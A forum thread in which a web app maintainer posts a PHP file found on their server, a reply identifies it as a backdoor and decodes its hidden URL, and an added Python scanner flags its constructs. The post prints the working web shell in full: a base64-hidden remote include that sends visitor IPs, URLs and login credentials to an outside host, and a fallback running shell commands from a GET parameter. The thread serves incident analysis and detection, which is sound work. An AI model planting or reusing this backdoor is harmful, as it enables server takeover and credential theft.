
Need help deciphering


ghost

I just stumbled across a couple of php files on the root of the web app I maintain where I work. Nobody knows how they got up there, but they look very sketchy, here is the source:

here's the other:

```php
<?php
error_reporting(0);   // suppress all errors so the script fails silently
if(isset($_POST["l"]) and isset($_POST["p"])){
    // credentials posted to the page are forwarded to the remote host (base64-encoded when "input" is set)
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// remote include: the base64 string is a URL; the visitor's IP, the requested URL and any
// posted credentials are appended as query parameters (the bare REMOTE_ADDR / REQUEST_URI
// constants are the sample's own sloppiness, left exactly as found)
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    // fallback when the remote include fails: run whatever shell command arrives in this GET parameter
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    // a "special" login confirms the shell is alive and prints the kernel/host details
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
```

Very worried and cannot decipher the code ourselves, although we do get the gist of the severity of `system($_GET["a3kfj39fsj2"])`: it seems like they're trying to execute commands using GET args? I don't know, but I would very much appreciate some professional insights.

ghost

Looks a bit like a backdoor… the `system($_GET["a3kfj39fsj2"])` bit looks like a backdoor to execute commands.

And the `aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9` bit decodes to: http://bis.iframe.ru/master.php?r_addr= and I think it sends all the info about your server to that site.

Looks very dodgy to me… maybe you should delete it.
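A small scanner, added here as an example and not code from either poster, that flags the constructs the reply points out in a PHP source (the base64-hidden remote include, a shell function fed straight from `$_GET`, backtick execution and silenced error reporting) and decodes any long base64 literal so the hidden URL is visible. The embedded sample is a trimmed copy of the posted file; the regex rules and function names are my own.

```python
import base64
import re

# Constructed sample: the second file from the post above, trimmed to the
# lines that matter for detection (the include expression is shortened).
SAMPLE = r'''<?php
error_reporting(0);
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . "x"))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>'''

# Each rule is (name, regex) and targets one construct seen in the post:
# a remote include whose URL is hidden with base64_decode, a shell function
# fed from a request superglobal, backtick execution, and error suppression.
RULES = [
    ("silenced_errors", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("obfuscated_include", re.compile(r"include(?:_once)?\s*\(\s*base64_decode\s*\(")),
    ("cmd_exec_from_request", re.compile(
        r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("backtick_exec", re.compile(r"`[^`\n]+`")),
]
# Quoted strings of 16+ base64 characters; short literals like "special" are ignored.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')

def decode_base64_literals(src):
    """Return (literal, decoded) pairs for quoted base64 strings that decode to printable ASCII."""
    out = []
    for lit in B64_LITERAL.findall(src):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:
            continue
        text = raw.decode("ascii") if raw.isascii() else None
        if text and text.isprintable():
            out.append((lit, text))
    return out

def scan_php_source(src):
    """Return the names of matched rules plus any decoded base64 literals."""
    hits = [name for name, rx in RULES if rx.search(src)]
    return {"rules": hits, "decoded": decode_base64_literals(src)}

if __name__ == "__main__":
    print(scan_php_source(SAMPLE))
```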